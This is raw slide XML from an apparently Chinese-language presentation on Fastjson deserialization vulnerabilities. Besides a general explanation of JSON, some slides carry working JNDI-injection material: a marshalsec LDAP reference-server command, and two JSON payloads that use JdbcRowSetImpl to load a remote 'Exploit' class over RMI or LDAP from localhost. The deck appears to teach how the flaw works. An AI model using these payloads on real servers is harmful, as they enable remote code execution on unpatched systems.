        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947960" y="9143672"/>
            <a:ext cx="18667395" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>java -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> marshalsec-0.0.3-SNAPSHOT-all.jar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>marshalsec.jndi.LDAPRefServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> http://127.0.0.1:8080/#Exploit 1389</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10418640" y="2356338"/>
            <a:ext cx="11392862" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/mbechler/marshalsec</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1962257055"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969505" y="2345806"/>
            <a:ext cx="6454010" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Rmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方式请求加载远程类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896567" y="7938305"/>
            <a:ext cx="6466834" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方式请求加载远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798785" y="3546135"/>
            <a:ext cx="23196331" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9B7C6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String payload = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A8759"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"{</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name</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@type</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java.lang.Class</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val</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com.sun.rowset.JdbcRowSetImpl</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x</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@type</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com.sun.rowset.JdbcRowSetImpl</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dataSourceName</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rmi://127.0.0.1:1099/Exploit</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autoCommit</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true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A8759"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}}"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798784" y="9266609"/>
            <a:ext cx="23196331" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9B7C6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String payload2 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A8759"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"{</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name</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@type</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java.lang.Class</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val</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com.sun.rowset.JdbcRowSetImpl</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x</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@type</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com.sun.rowset.JdbcRowSetImpl</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dataSourceName</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ldap://127.0.0.1:1389/Exploit</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autoCommit</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true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A8759"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}}"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC7832"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="4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643275880"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2345806"/>
            <a:ext cx="12938158" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>对于最新的反序列化漏洞版本小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.2.48</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>有漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2104343566"/>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43197" y="6016356"/>
            <a:ext cx="8108950" cy="1591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9600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>谢  谢</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74133" y="5409878"/>
            <a:ext cx="5422600" cy="2804160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C3367"/>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zh-CN" altLang="en-US" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>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91126" y="465461"/>
            <a:ext cx="3107541" cy="1492722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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643197" y="6016356"/>
            <a:ext cx="8108950" cy="1591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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="9600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&amp; A</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" b="1"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625600" y="5665332"/>
            <a:ext cx="5422600" cy="2804160"/>
            <a:chOff x="2438400" y="8022136"/>
            <a:chExt cx="5422600" cy="2804160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="文本框 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2438400" y="8022136"/>
              <a:ext cx="5422600" cy="2804160"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1C3367"/>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zh-CN" altLang="en-US" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>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59" y="8335780"/>
              <a:ext cx="4810161" cy="2310584"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923099" y="5409878"/>
            <a:ext cx="5422600" cy="2804160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C3367"/>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zh-CN" altLang="en-US" sz="4600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>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91126" y="465461"/>
            <a:ext cx="3107541" cy="1492722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1941898422"/>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593429"/>
            <a:ext cx="6871113" cy="1251544"/>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en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>基本概念</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1C3267"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2457756"/>
            <a:ext cx="21947305" cy="5771291"/>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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	 JSON(JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Object Notation, JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象简谱</a:t>
            </a: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是一种轻量级的数据交换格式。它基于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ECMAScript</a:t>
            </a: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欧洲计算机协会制定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规范</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的一个子集，采用完全独立于编程语言的文本格式来存储和表示数据。简洁和清晰的层次结构使得 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>成为理想的数据交换语言。 易于人阅读和编写，同时也易于机器解析和生成，并有效地提升网络传输效率</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	 JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Douglas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Crockford</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>年开始推广使用的数据格式，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>年正式成为主流的数据格式，雅虎和谷歌就在那时候开始广泛地使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
